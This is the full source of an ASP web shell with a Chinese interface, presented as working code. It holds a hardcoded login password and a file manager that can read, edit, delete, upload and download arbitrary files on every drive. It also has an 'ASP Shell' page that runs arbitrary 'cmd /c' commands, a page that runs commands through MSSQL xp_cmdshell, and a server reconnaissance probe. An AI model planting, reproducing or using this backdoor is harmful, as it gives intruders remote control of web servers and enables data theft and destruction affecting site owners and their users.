<%@ LANGUAGE = VBScript.Encode codepage ="936" %> <%Server.ScriptTimeOut=5000%> <object runat=server id=oScript scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object> <object runat=server id=oScriptNet scope=page classid="clsid:093FF999-1EA0-4079-9525-9614C3504B74"></object> <object runat=server id=oFileSys scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object> <% on error resume next dim Data_5xsoft Class upload_5xsoft dim objForm,objFile,Version Public function Form(strForm) strForm=lcase(strForm) if not objForm.exists(strForm) then Form="" else Form=objForm(strForm) end if end function
Public function File(strFile) strFile=lcase(strFile) if not objFile.exists(strFile) then set File=new FileInfo else set File=objFile(strFile) end if end function
Private Sub Class_Initialize dim RequestData,sStart,vbCrlf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,theFile dim iFileSize,sFilePath,sFileType,sFormValue,sFileName dim iFindStart,iFindEnd dim iFormStart,iFormEnd,sFormName Version="HTTP上传程序 Version 2.0" set objForm=Server.CreateObject("Scripting.Dictionary") set objFile=Server.CreateObject("Scripting.Dictionary") if Request.TotalBytes<1 then Exit Sub set tStream = Server.CreateObject("adodb.stream") set Data_5xsoft = Server.CreateObject("adodb.stream") Data_5xsoft.Type = 1 Data_5xsoft.Mode =3 Data_5xsoft.Open Data_5xsoft.Write Request.BinaryRead(Request.TotalBytes) Data_5xsoft.Position=0 RequestData =Data_5xsoft.Read
iFormStart = 1 iFormEnd = LenB(RequestData) vbCrlf = chrB(13) & chrB(10) sStart = MidB(RequestData,1, InStrB(iFormStart,RequestData,vbCrlf)-1) iStart = LenB (sStart) iFormStart=iFormStart+iStart+1 while (iFormStart + 10) < iFormEnd iInfoEnd = InStrB(iFormStart,RequestData,vbCrlf & vbCrlf)+3 tStream.Type = 1 tStream.Mode =3 tStream.Open Data_5xsoft.Position = iFormStart Data_5xsoft.CopyTo tStream,iInfoEnd-iFormStart tStream.Position = 0 tStream.Type = 2 tStream.Charset ="gb2312" sInfo = tStream.ReadText tStream.Close iFormStart = InStrB(iInfoEnd,RequestData,sStart) iFindStart = InStr(22,sInfo,"name=""",1)+6 iFindEnd = InStr(iFindStart,sInfo,"""",1) sFormName = lcase(Mid (sinfo,iFindStart,iFindEnd-iFindStart)) if InStr (45,sInfo,"filename=""",1) > 0 then set theFile=new FileInfo iFindStart = InStr(iFindEnd,sInfo,"filename=""",1)+10 iFindEnd = InStr(iFindStart,sInfo,"""",1) sFileName = Mid (sinfo,iFindStart,iFindEnd-iFindStart) theFile.FileName=getFileName(sFileName) theFile.FilePath=getFilePath(sFileName) iFindStart = InStr(iFindEnd,sInfo,"Content-Type: ",1)+14 iFindEnd = InStr(iFindStart,sInfo,vbCr) theFile.FileType =Mid (sinfo,iFindStart,iFindEnd-iFindStart) theFile.FileStart =iInfoEnd theFile.FileSize = iFormStart -iInfoEnd -3 theFile.FormName=sFormName if not objFile.Exists(sFormName) then objFile.add sFormName,theFile end if else tStream.Type =1 tStream.Mode =3 tStream.Open Data_5xsoft.Position = iInfoEnd Data_5xsoft.CopyTo tStream,iFormStart-iInfoEnd-3 tStream.Position = 0 tStream.Type = 2 tStream.Charset ="gb2312" sFormValue = tStream.ReadText tStream.Close if objForm.Exists(sFormName) then objForm(sFormName)=objForm(sFormName)&", "&sFormValue else objForm.Add sFormName,sFormValue end if end if iFormStart=iFormStart+iStart+1 wend RequestData="" set tStream =nothing End Sub
Private Sub Class_Terminate if Request.TotalBytes>0 then objForm.RemoveAll objFile.RemoveAll set objForm=nothing set objFile=nothing Data_5xsoft.Close set Data_5xsoft =nothing end if End Sub
Private function GetFilePath(FullPath) If FullPath <> "" Then GetFilePath = left(FullPath,InStrRev(FullPath, "\")) Else GetFilePath = "" End If End function
Private function GetFileName(FullPath) If FullPath <> "" Then GetFileName = mid(FullPath,InStrRev(FullPath, "\")+1) Else GetFileName = "" End If End function End Class
Class FileInfo dim FormName,FileName,FilePath,FileSize,FileType,FileStart Private Sub Class_Initialize FileName = "" FilePath = "" FileSize = 0 FileStart= 0 FormName = "" FileType = "" End Sub
Public function SaveAs(FullPath) dim dr,ErrorChar,i SaveAs=true if trim(fullpath)="" or FileStart=0 or FileName="" or right(fullpath,1)="/" then exit function set dr=CreateObject("Adodb.Stream") dr.Mode=3 dr.Type=1 dr.Open Data_5xsoft.position=FileStart Data_5xsoft.copyto dr,FileSize dr.SaveToFile FullPath,2 dr.Close set dr=nothing SaveAs=false end function End Class httpt = Request.ServerVariables("server_name") rseb=Request.ServerVariables("SCRIPT_NAME") q=request("q") if q="" then q=rseb select case q case rseb if Epass(trim(request.form("password")))="q_ux888556" then response.cookies("password")="7758521" response.redirect rseb & "?q=list.ASP" else %> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title><%=httpt%></title> <meta name="GENERATOR" content="Microsoft FrontPage 3.0"> </head>
<body> <%if request.form("password")<>"" then response.write "Password Error!" end if %>
<table border="1" width="100%" height="89" bgcolor="#DFDFFF" cellpadding="3" bordercolorlight="#000000" bordercolordark="#F2F2F9" cellspacing="0"> <tr> <td width="100%" height="31" bgcolor="#000080"><p align="center"><font color="#FFFFFF"><%=httpt%></font></td> </tr> <tr> <td width="100%" height="46"><form method="POST" action="<%=rseb%>?q=<%=rseb%>"> <div align="center"><center><p>Enter Password:<input type="password" name="password" size="20" style="border-left: thin none; border-right: thin none; border-top: thin outset; border-bottom: thin outset"> <input type="submit" value="OK!LOGIN" name="B1" style="font-size: 9pt; border: thin outset"></p> </center></div> </form> </td> </tr> </table> </body> </html> <%end if%>
<%case "down.asp" call downloadFile(request("path")) function downloadFile(strFile) strFilename = strFile Response.Buffer = True Response.Clear set s = Server.CreateObject("adodb.stream") s.Open s.Type = 1 if not oFileSys.FileExists(strFilename) then Response.Write("<h1>Error:</h1>" & strFilename & " does not exist<p>") Response.End end if Set f = oFileSys.GetFile(strFilename) intFilelength = f.size s.LoadFromFile(strFilename) if err then Response.Write("<h1>Error: </h1>" & err.Description & "<p>") Response.End end if Response.AddHeader "Content-Disposition", "attachment; filename=" & f.name Response.AddHeader "Content-Length", intFilelength Response.CharSet = "UTF-8" Response.ContentType = "application/octet-stream" Response.BinaryWrite s.Read Response.Flush s.Close Set s = Nothing response.end End Function %> <%case "list.asp"%> <% urlpath=server.urlencode(path) if Request.Cookies("password")="7758521" then dim cpath,lpath if Request("path")="" then lpath="/" else lpath=Request("path")&"/" end if if Request("attrib")="true" then cpath=lpath attrib="true" else cpath=Server.MapPath(lpath) attrib="" end if Sub GetFolder() dim theFolder,theSubFolders if oFileSys.FolderExists(cpath)then Set theFolder=oFileSys.GetFolder(cpath) Set theSubFolders=theFolder.SubFolders Response.write"<a href=" & rseb & "?q=list.asp&path="&Request("oldpath")&"&attrib="&attrib&"><font color=#FF8000>■</font>↑<font color=ff2222>回上级目录</font></a><br><script language=VBScript>" For Each x In theSubFolders %>so "<%=lpath%>","<%=x.Name%>","<%=request("path")%>","<%=attrib%>" <% Next %></script><% end if End Sub
Sub GetFile() dim theFiles if oFileSys.FolderExists(cpath)then Set theFolder=oFileSys.GetFolder(cpath) Set theFiles=theFolder.Files Response.write"<table border=0 width=100% cellpadding=0><script language=vbscript>" For Each x In theFiles if Request("attrib")="true" then showstring=x.Name else showstring=x.Name end if %>sf "<%=showstring%>","<%=x.size%>","<%=x.type%>","<%=x.Attributes%>","<%=x.DateLastModified%>","<%=lpath%>","<%=x.name%>","<%=attrib%>","<%=x.name%>" <% Next end if Response.write"</script></table>" End Sub %> <html>
<head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title><%=httpt%></title> <style type="text/css"> <!-- table{ font-family: 宋体; font-size: 9pt } a{ font-family: 宋体; font-size: 9pt; color: rgb(0,32,64); text-decoration: none } a:hover{ font-family: 宋体; color: rgb(255,0,0); text-decoration: none } a:visited{ color: rgb(128,0,0) } td { font-size: 9pt} a { color: #000000; text-decoration: none} a:hover { text-decoration: underline} .tx { height: 16px; 30px; border-color: black black #000000; border-top- 0px; border-right- 0px; border-bottom- 1px; border-left- 0px; font-size: 9pt; background-color: #eeeeee; color: #0000FF} .bt { font-size: 9pt; border-top- 0px; border-right- 0px; border-bottom- 0px; border-left- 0px; height: 16px; 80px; background-color: #eeeeee; cursor: hand} .tx1 { height: 18px; 60px; font-size: 9pt; border: 1px solid; border-color: black black #000000; color: #0000FF} --> </style> </head> <script language="JavaScript"> function crfile(ls) {if (ls==""){alert("请输入文件名!");} else {window.open("<%=rseb%>?q=edit.asp&attrib=<%=request("attrib")%>&creat=yes&path=<%=lpath%>"+ls);} return false; } function crdir(ls) {if (ls==""){alert("请输入文件名!");} else {window.open("<%=rseb%>?q=edir.asp&attrib=<%=request("attrib")%>&op=creat&path=<%=lpath%>"+ls);} return false; } </script> <script language="vbscript"> sub sf(showstring,size,type1,Attributes,DateLastModified,lpath,xname,attrib,name) document.write "<tr style=""color: #000000; background-color: #FFefdf; text-decoration: blink; border: 1px solid #000080"" onMouseOver=""this.style.backgroundColor = #FFCC00"" onMouseOut=""this.style.backgroundColor = #FFefdf""><td width=50%><font color=#FF8000><font face=Wingdings>+</font></font><a href="& urlpath & lpath & xName &" target=_blank><strong>" & showstring & "</strong></a></td><td width=20% align=right>" & size & "字节</td><td width=30%><a href=# title=类型:" & type1 & chr(10) & "属性:" & Attributes & chr(10) & "时间:" & DateLastModified &">属性</a> <a href=<%=rseb%>?q=edit.asp&path=" & lpath & xName & "&attrib=" & attrib &" target=_blank ><font color=#FF8000 ></font>编辑</a> <a href="&chr(34)&"Javascript: rmdir1("& lpath & xName &")"&chr(34)&"><font color=#FF8000 ></font>删除</a> <a href=# onclick=copyfile(" & lpath & Name & ")><font color=#FF8000 ></font>复制</a> <a href=<%=rseb%>?q=down.asp&path=<%=cpath%>\"&xName&"&attrib=" & attrib &" target=_blank ><font color=#FF8000 ></font>下载</a></td></tr>" end sub sub so(lpath,xName,path,attrib) document.write "<a href=<%=rseb%>?q=list.asp&path="& lpath & xName & "&oldpath=" & path & "&attrib=" & attrib &">└<font color=#FF8000><font face=Wingdings>1</font></font> " & xName &"</a> <a href="&chr(34)&"javascript: rmdir("& lpath & xName &")"&chr(34)&"><font color=#FF8000 ></font>删除</a><br>" end sub
sub rmdir1(ls) if confirm("你真的要删除这个文件吗!"&Chr(13)&Chr(10)&"文件为:"&ls) then window.open("<%=rseb%>?q=edit.asp&path=" & ls & "&op=del&attrib=<%=request("attrib")%>") end if end sub
sub rmdir(ls) if confirm("你真的要删除这个目录吗!"&Chr(13)&Chr(10)&"目录为:"&ls) then window.open("<%=rseb%>?q=edir.asp&path="&ls&"&op=del&attrib=<%=request("attrib")%>") end if end sub
sub copyfile(sfile) dfile=InputBox("※文件复制※"&Chr(13)&Chr(10)&"源文件:"& sfile&Chr(13)&Chr(10)&"输入目标文件的文件名:"&Chr(13)&Chr(10) &"[允许带路径,要根据你的当前路径模式]") dfile=trim(dfile) attrib="<%=request("attrib")%>" if dfile<>"" then if InStr(dfile,":") or InStr(dfile,"/")=1 then lp="" if InStr(dfile,":") and attrib<>"true" then alert "对不起,你在相对路径模式下不能使用绝对路径"&Chr(13)&Chr(10)&"错误路径:["&dfile&"]" exit sub end if else lp="<%=lpath%>" end if window.open("<%=rseb%>?q=edit.asp&path="+sfile+"&op=copy&attrib="+attrib+"&dpath="+lp+dfile) else alert"您没有输入文件名!" end If end sub </script> <body> <table border="1" width="100%" cellpadding="0" height="81" bordercolorlight="#000000" bordercolordark="#FFFFFF" cellspacing="0"> <tr> <td width="755" bgcolor="#000080" colspan="2" height="23"><p align="center"><font size="3" color="#FFFFFF"><%=httpt%></font></td> </tr> <tr> <td width="751" bgcolor="#C0C0C0" colspan="2">※换盘:<span style="background-color: rgb(255,255,255);color:rgb(255,0,0)"><% For Each thing in oFileSys.Drives Response.write "<font face=Wingdings>:</font><a href=" & rseb & "?q=list.asp&path="&thing.DriveLetter&":&attrib=true>"&thing.DriveLetter&":</a>" NEXT %> </span> 地址: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %></td> </tr> <tr> <td width="751" bgcolor="#C0C0C0" colspan="2">※<% if Request("attrib")="true" then response.write "<a href=" & rseb & "?q=list.asp>切到相对路径</a>" else response.write "<a href=" & rseb & "?attrib=true&q=list.asp>切到绝对路径</a>" end if %> ※绝对:<span style="background-color: rgb(255,255,255)"><%=cpath%></span></td> </tr> <tr> <td width="751" bgcolor="#C0C0C0" colspan="2">※当前<font color="#FF8000"><font face=Wingdings>1</font></font>:<span style="background-color: rgb(255,255,255)"><%=lpath%></span> </td> </tr><form name="form1" method="post" action="<%=rseb%>?q=upfile.asp" target="_blank" enctype="multipart/form-data"> <tr><td bgcolor="#C0C0C0" colspan="2" style="height: 20px"> 编辑| <input class="tx1" type="text" name="filename" size="20"> <input class="tx1" type="button" value="建文" onclick="crfile(form1.filename.value)"> <input class="tx1" type="button" value="建目" onclick="crdir(form1.filename.value)"> <input type="file" name="file1" class="tx1" style="100" value=""> <input type="text" name="filepath" class="tx1" style="100" value="<%=cpath%>"> <input type="hidden" name="act" value="upload"> <input type="hidden" name="upcount" class="tx" value="1"> <input class="tx1" type="submit" value="上传"> <input class="tx1" type="button" onclick="window.open(<%=rseb%>?q=cmd.asp,_blank)" value="命令"> <input class="tx1" type="button" onclick="window.open(<%=rseb%>?q=test.asp,_blank)" value="配置"> <input class="tx1" type="button" onclick="window.open(<%=rseb%>?q=p.asp,_blank)" value="nfso"> </td> </td> </tr></form> <tr> <td width="169" valign="top" bgcolor="#C8E3FF"><%Call GetFolder()%> </td> <td width="582" valign="top" bgcolor="#FFefdf"><%Call GetFile()%> </td> </tr> </table> <%else response.write "Password Error!" response.write "<a href=" & rseb & "?q=" & rseb & ">【返 回】</a>" end if %> </body> </html> <%case "edit.asp"%> <html>
<head> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=gb_2312-80"> <title>编辑源代码</title> <style> <!-- table{ font-family: 宋体; font-size: 12pt } a{ font-family: 宋体; font-size: 12pt; color: rgb(0,32,64); text-decoration: none } a:hover{ font-family: 宋体; color: rgb(255,0,0); text-decoration: underline } a:visited{ color: rgb(128,0,0) } --> </style> </head>
<body> <% 读文件 if Request.Cookies("password")="7758521" then if request("op")="del" then if Request("attrib")="true" then whichfile=Request("path") else whichfile=server.mappath(Request("path")) end if Set thisfile = oFileSys.GetFile(whichfile) thisfile.Delete True Response.write "<script>alert(删除成功!要刷新才能看到效果);window.close();</script>" else if request("op")="copy" then if Request("attrib")="true" then whichfile=Request("path") dsfile=Request("dpath") else whichfile=server.mappath(Request("path")) dsfile=Server.MapPath(Request("dpath")) end if Set thisfile = oFileSys.GetFile(whichfile) thisfile.copy dsfile %> <script language=vbscript> msgbox "源文件:<%=whichfile%>" & vbcrlf & "目的文件:<%=dsfile%>" & vbcrlf & "复制成功!要刷新才能看到效果!" window.close() </script> <% else if request.form("text")="" then if Request("creat")<>"yes" then if Request("attrib")="true" then whichfile=Request("path") else whichfile=server.mappath(Request("path")) end if Set thisfile = oFileSys.OpenTextFile(whichfile, 1, False) counter=0 thisline=thisfile.readall thisfile.Close set fs=nothing end if %>
<form method="POST" action="<%=rseb%>?q=edit.asp"> <input type="hidden" name="attrib" value="<%=Request("attrib")%>"><table border="0" width="700" cellpadding="0"> <tr> <td width="100%" bgcolor="#FFDBCA"><div align="center"><center><p><%=httpt%></td> </tr> <tr align="center"> <td width="100%" bgcolor="#FFDBCA">文件名:<input type="text" name="path" size="45" value="<%=Request("path")%> ">直接更改文件名,相当于“另存为”</td> </tr> <tr align="center"> <td width="100%" bgcolor="#FFDBCA"><textarea rows="25" name="text" cols="90"><%=thisline%></textarea></td> </tr> <tr align="center"> <td width="100%" bgcolor="#FFDBCA"><div align="center"><center><p><input type="submit" value="提交" name="B1"><input type="reset" value="复原" name="B2"></td> </tr> </table> </form> <%else if Request("attrib")="true" then whichfile=Request("path") else whichfile=server.mappath(Request("path")) end if Set outfile=oFileSys.CreateTextFile(whichfile) outfile.WriteLine Request("text") outfile.close set fs=nothing Response.write "<script>alert(修改成功!要刷新才能看到效果);window.close();</script>" end if end if end if else response.write "Password Error!" response.write "<a href=" & rseb & "?q=" & rseb & ">【返 回】</a>" end if %> </body> </html> <%case "edir.asp"%> <html>
<head> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=gb_2312-80"> <title>目录操作</title> <style> <!-- table{ font-family: 宋体; font-size: 12pt } a{ font-family: 宋体; font-size: 12pt; color: rgb(0,32,64); text-decoration: none } a:hover{ font-family: 宋体; color: rgb(255,0,0); text-decoration: underline } a:visited{ color: rgb(128,0,0) } --> </style> </head>
<body> <% 读文件 if Request.Cookies("password")="7758521" then
if request("op")="del" then
if Request("attrib")="true" then whichdir=Request("path") else whichdir=server.mappath(Request("path")) end if oFileSys.DeleteFolder whichdir,True Response.write "<script>alert(删除的目录为:" & whichdir & "删除成功!要刷新才能看到效果);window.close();</script>"
if request("op")="creat" then if Request("attrib")="true" then whichdir=Request("path") else whichdir=server.mappath(Request("path")) end if oFileSys.CreateFolder whichdir Response.write "<script>alert(建立的目录为:" & whichdir & "建立成功!要刷新才能看到效果);window.close();</script>" end if end if else response.write "Password Error!" response.write "<a href=" & rseb & "?q=" & rseb & ">【返 回】</a>" end if %> </body> </html> <% case "upfile.asp" if Request.Cookies("password")="7758521" then set upload=new upload_5xSoft if upload.form("filepath")="" then HtmEnd "请输入要上传至的目录!" set upload=nothing response.end else formPath=upload.form("filepath") if right(formPath,1)<>"/" then formPath=formPath&"/" end if
iCount=0 for each formName in upload.objForm set file=upload.file(formName) if file.FileSize>0 then file.SaveAs formPath & file.FileName response.write file.FilePath&file.FileName&" ("&file.FileSize&") => "&formPath&File.FileName&" 成功!<br>" iCount=iCount+1 end if set file=nothing next set upload=nothing Htmend iCount&" 个文件上传结束!"
sub HtmEnd(Msg) set upload=nothing Response.write "上传完毕!要刷新才能看到效果!<P><input value=关闭 type=button onclick=window.close();>" response.end end sub else response.write "Password Error!" response.write "<a href=" & rseb & "?q=" & rseb & ">【返 回】</a>" end if
case "cmd.asp"
if Request.Cookies("password")<>"7758521" then response.write "Password Error!" response.write "<a href=" & rseb & "?q=" & rseb & ">【返 回】</a>" else%> <title>ASP Shell</title> <object runat=server id=oScript scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object> <object runat=server id=oScriptNet scope=page classid="clsid:093FF999-1EA0-4079-9525-9614C3504B74"></object> <object runat=server id=oFileSys scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object> <% On Error Resume Next szCMD = Request.Form(".CMD") If (szCMD <> "") Then szTempFile = "C:\winnt\help\" & oFileSys.GetTempName( ) Call oScript.Run ("cmd /c " & szCMD & " > " & szTempFile, 0, True) Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) End If %> <HTML> <BODY> <FORM action="<%=rseb%>?q=cmd.asp" method="POST"> <input type=text name=".CMD" size=45 value="<%= szCMD %>"> <input type=submit value="执行命令"> </FORM> <PRE> <% If (IsObject(oFile)) Then On Error Resume Next Response.Write Server.HTMLEncode(oFile.ReadAll) oFile.Close Call oFileSys.DeleteFile(szTempFile, True) End If %> </BODY> </HTML> <%end if case "sql.asp" if Request.Cookies("password")<>"7758521" then response.write "Password Error!" response.write "<a href=" & rseb & "?q=" & rseb & ">【返 回】</a>" else If trim(request.form("sqlcmd"))<>"" Then password= trim(Request.form("pa")) id=trim(Request.form("id")) SqlLocalName=trim(Request.form("SqlLocalName")) if SqlLocalName="" or SqlLocalName="MSSQL服务器地址" then SqlLocalName="" set adoConn=Server.CreateObject("ADODB.Connection") adoConn.Open "Provider=SQLOLEDB.1;Password="&password&";User ID="&id&";Data Source ="&SqlLocalName strQuery = "exec master.dbo.xp_cmdshell " & request.form("sqlcmd") & "" set recResult = adoConn.Execute(strQuery) If NOT recResult.EOF Then Do While NOT recResult.EOF strResult = strResult & chr(13) & recResult(0) recResult.MoveNext Loop End if set recResult = Nothing strResult = Replace(strResult," "," ") strResult = Replace(strResult,"<","<") strResult = Replace(strResult,">",">") strResult = Replace(strResult,chr(13),"<br>") End if set adoConn = Nothing %><table border=0 width=500 cellspacing=0 cellpadding=0 bgcolor="#B8B8B8"> <tr bgcolor="#EEEEEE" height=18 class="noborder"> <form name="form" method=post action="<%=rseb%>?q=sql.asp"> <input type="text" name="sqlcmd" size=70 > <br> <input type="text" name="id" size=10 value="mssql用户名"> <input type="text" name="pa" size=20 value="mssql密码"> <input type="text" name="SqlLocalName" size=20 value="mssql服务器地址"> <input type="submit" value="执行命令"> </form></tr></table> <% Response.Write request.form("sqlcmd") & "<br><br>" Response.Write strResult end if case "test.asp" Response.Buffer = False Dim ObjTotest(26,4) ObjTotest(0,0) = "MSWC.AdRotator" ObjTotest(1,0) = "MSWC.BrowserType" ObjTotest(2,0) = "MSWC.NextLink" ObjTotest(3,0) = "MSWC.Tools" ObjTotest(4,0) = "MSWC.Status" ObjTotest(5,0) = "MSWC.Counters" ObjTotest(6,0) = "IISSample.ContentRotator" ObjTotest(7,0) = "IISSample.PageCounter" ObjTotest(8,0) = "MSWC.PermissionChecker" ObjTotest(9,0) = "Script"+"ing.File"+"Syst"+"emObject" ObjTotest(9,1) = "(FSO 文本文件读写)" ObjTotest(10,0) = "adodb.connection" ObjTotest(10,1) = "(ADO 数据对象)"
ObjTotest(11,0) = "SoftArtisans.FileUp" ObjTotest(11,1) = "(SA-FileUp 文件上传)" ObjTotest(12,0) = "SoftArtisans.FileManager" ObjTotest(12,1) = "(SoftArtisans 文件管理)" ObjTotest(13,0) = "LyfUpload.UploadFile" ObjTotest(13,1) = "(刘云峰的文件上传组件)" ObjTotest(14,0) = "Persits.Upload.1" ObjTotest(14,1) = "(ASPUpload 文件上传)" ObjTotest(15,0) = "w3.upload" ObjTotest(15,1) = "(Dimac 文件上传)"
ObjTotest(16,0) = "JMail.SmtpMail" ObjTotest(16,1) = "(Dimac JMail 邮件收发)" ObjTotest(17,0) = "CDONTS.NewMail" ObjTotest(17,1) = "(虚拟 SMTP 发信)" ObjTotest(18,0) = "Persits.MailSender" ObjTotest(18,1) = "(ASPemail 发信)" ObjTotest(19,0) = "SMTPsvg.Mailer" ObjTotest(19,1) = "(ASPmail 发信)" ObjTotest(20,0) = "DkQmail.Qmail" ObjTotest(20,1) = "(dkQmail 发信)" ObjTotest(21,0) = "Geocel.Mailer" ObjTotest(21,1) = "(Geocel 发信)" ObjTotest(22,0) = "IISmail.Iismail.1" ObjTotest(22,1) = "(IISmail 发信)" ObjTotest(23,0) = "SmtpMail.SmtpMail.1" ObjTotest(23,1) = "(SmtpMail 发信)"
ObjTotest(24,0) = "SoftArtisans.ImageGen" ObjTotest(24,1) = "(SA 的图像读写组件)" ObjTotest(25,0) = "W3Image.Image" ObjTotest(25,1) = "(Dimac 的图像读写组件)" public IsObj,VerObj,TestObj dim i for i=0 to 25 on error resume next IsObj=false VerObj="" dim TestObj TestObj="" set TestObj=server.CreateObject(ObjTotest(i,0)) If -2147221005 <> Err then IsObj = True VerObj = TestObj.version if VerObj="" or isnull(VerObj) then VerObj=TestObj.about end if ObjTotest(i,2)=IsObj ObjTotest(i,3)=VerObj next sub ObjTest(strObj) on error resume next IsObj=false VerObj="" TestObj="" set TestObj=server.CreateObject (strObj) If -2147221005 <> Err then IsObj = True VerObj = TestObj.version if VerObj="" or isnull(VerObj) then VerObj=TestObj.about end if End sub %> <HTML> <HEAD> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <TITLE>ASP探针V1.60-阿江<a href= http://www.ajiang.net</TITLE> target=_blank http://www.ajiang.net</TITLE></a> <style> <!-- BODY { FONT-FAMILY: 宋体; FONT-SIZE: 9pt } TD { FONT-SIZE: 9pt } A { COLOR: #000000; TEXT-DECORATION: none } A:hover { COLOR: #3F8805; TEXT-DECORATION: underline } .input { BORDER: #111111 1px solid; FONT-SIZE: 9pt; BACKGROUND-color: #F8FFF0 } .backs { BACKGROUND-COLOR: #3F8805; COLOR: #ffffff;
} .backq { BACKGROUND-COLOR: #EEFEE0 } .backc { BACKGROUND-COLOR: #3F8805; BORDER: medium none; COLOR: #ffffff; HEIGHT: 18px; font-size: 9pt } .fonts { COLOR: #3F8805 } --> </STYLE> </HEAD> <BODY> <a href="mailto:info@ajiang.net">阿江</a>改写的ASP探针-<font class=fonts>V1.60</font><br><br> <font class=fonts>是否支持ASP</font> <br>出现以下情况即表示您的空间不支持ASP: <br>1、访问本文件时提示下载。 <br>2、访问本文件时看到类似“<%@ Language="VBScript" %>”的文字。 <br><br>
<font class=fonts>服务器的有关参数</font> <table border=0 width=450 cellspacing=0 cellpadding=0 bgcolor="#3F8805"> <tr><td>
<table border=0 width=450 cellspacing=1 cellpadding=0> <tr bgcolor="#EEFEE0" height=18> <td align=left> 服务器名</td><td> <%=Request.ServerVariables("SERVER_NAME")%></td> </tr> <tr bgcolor="#EEFEE0" height=18> <td align=left> 服务器IP</td><td> <%=Request.ServerVariables("LOCAL_ADDR")%></td> </tr> <tr bgcolor="#EEFEE0" height=18> <td align=left> 服务器端口</td><td> <%=Request.ServerVariables("SERVER_PORT")%></td> </tr> <tr bgcolor="#EEFEE0" height=18> <td align=left> 服务器时间</td><td> <%=now%></td> </tr> <tr bgcolor="#EEFEE0" height=18> <td align=left> IIS版本</td><td> <%=Request.ServerVariables("SERVER_SOFTWARE")%></td> </tr> <tr bgcolor="#EEFEE0" height=18> <td align=left> 脚本超时时间</td><td> <%=Server.ScriptTimeout%> 秒</td> </tr> <tr bgcolor="#EEFEE0" height=18> <td align=left> 本文件路径</td><td> <%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%></td> </tr> <tr bgcolor="#EEFEE0" height=18> <td align=left> 服务器CPU数量</td><td> <%=Request.ServerVariables("NUMBER_OF_PROCESSORS")%> 个</td> </tr> <tr bgcolor="#EEFEE0" height=18> <td align=left> 服务器解译引擎</td><td> <%=ScriptEngine & "/"& ScriptEngineMajorVersion &"."&ScriptEngineMinorVersion&"."& ScriptEngineBuildVersion %></td> </tr> <tr bgcolor="#EEFEE0" height=18> <td align=left> 服务器操作系统</td><td> <%=Request.ServerVariables("OS")%></td> </tr> </table>
</td></tr> </table> <br> <font class=fonts>组件支持情况</font> <% Dim strClass strClass = Trim(Request.Form("classname")) If "" <> strClass then Response.Write "<br>您指定的组件的检查结果:" Dim Verobj1 ObjTest(strClass) If Not IsObj then Response.Write "<br><font color=red>很遗憾,该服务器不支持 " & strclass & " 组件!</font>" Else if VerObj="" or isnull(VerObj) then Verobj1="无法取得该组件版本" Else Verobj1="该组件版本是:" & VerObj End If Response.Write "<br><font class=fonts>恭喜!该服务器支持 " & strclass & " 组件。" & verobj1 & "</font>" End If Response.Write "<br>" end if %> <br>■ IIS自带的ASP组件 <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#3F8805" width="450"> <tr height=18 class=backs align=center><td width=320>组 件 名 称</td><td width=130>支持及版本</td></tr> <%For i=0 to 10%> <tr height="18" class=backq> <td align=left> <%=ObjTotest(i,0) & "<font color=#888888> " & ObjTotest(i,1)%></font></td> <td align=left> <% If Not ObjTotest(i,2) Then Response.Write "<font color=red><b>×</b></font>" Else Response.Write "<font class=fonts><b>√</b></font> <a title=" & ObjTotest(i,3) & ">" & left(ObjTotest(i,3),11) & "</a>" End If%></td> </tr> <%next%> </table>
<br>■ 常见的文件上传和管理组件 <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#3F8805" width="450"> <tr height=18 class=backs align=center><td width=320>组 件 名 称</td><td width=130>支持及版本</td></tr> <%For i=11 to 15%> <tr height="18" class=backq> <td align=left> <%=ObjTotest(i,0) & "<font color=#888888> " & ObjTotest(i,1)%></font></td> <td align=left> <% If Not ObjTotest(i,2) Then Response.Write "<font color=red><b>×</b></font>" Else Response.Write "<font class=fonts><b>√</b></font> <a title=" & ObjTotest(i,3) & ">" & left(ObjTotest(i,3),11) & "</a>" End If%></td> </tr> <%next%> </table>
<br>■ 常见的收发邮件组件 <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#3F8805" width="450"> <tr height=18 class=backs align=center><td width=320>组 件 名 称</td><td width=130>支持及版本</td></tr> <%For i=16 to 23%> <tr height="18" class=backq> <td align=left> <%=ObjTotest(i,0) & "<font color=#888888> " & ObjTotest(i,1)%></font></td> <td align=left> <% If Not ObjTotest(i,2) Then Response.Write "<font color=red><b>×</b></font>" Else Response.Write "<font class=fonts><b>√</b></font> <a title=" & ObjTotest(i,3) & ">" & left(ObjTotest(i,3),11) & "</a>" End If%></td> </tr> <%next%> </table>
<br>■ 图像处理组件 <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#3F8805" width="450"> <tr height=18 class=backs align=center><td width=320>组 件 名 称</td><td width=130>支持及版本</td></tr> <%For i=24 to 25%> <tr height="18" class=backq> <td align=left> <%=ObjTotest(i,0) & "<font color=#888888> " & ObjTotest(i,1)%></font></td> <td align=left> <% If Not ObjTotest(i,2) Then Response.Write "<font color=red><b>×</b></font>" Else Response.Write "<font class=fonts><b>√</b></font> <a title=" & ObjTotest(i,3) & ">" & left(ObjTotest(i,3),11) & "</a>" End If%></td> </tr> <%next%> </table>
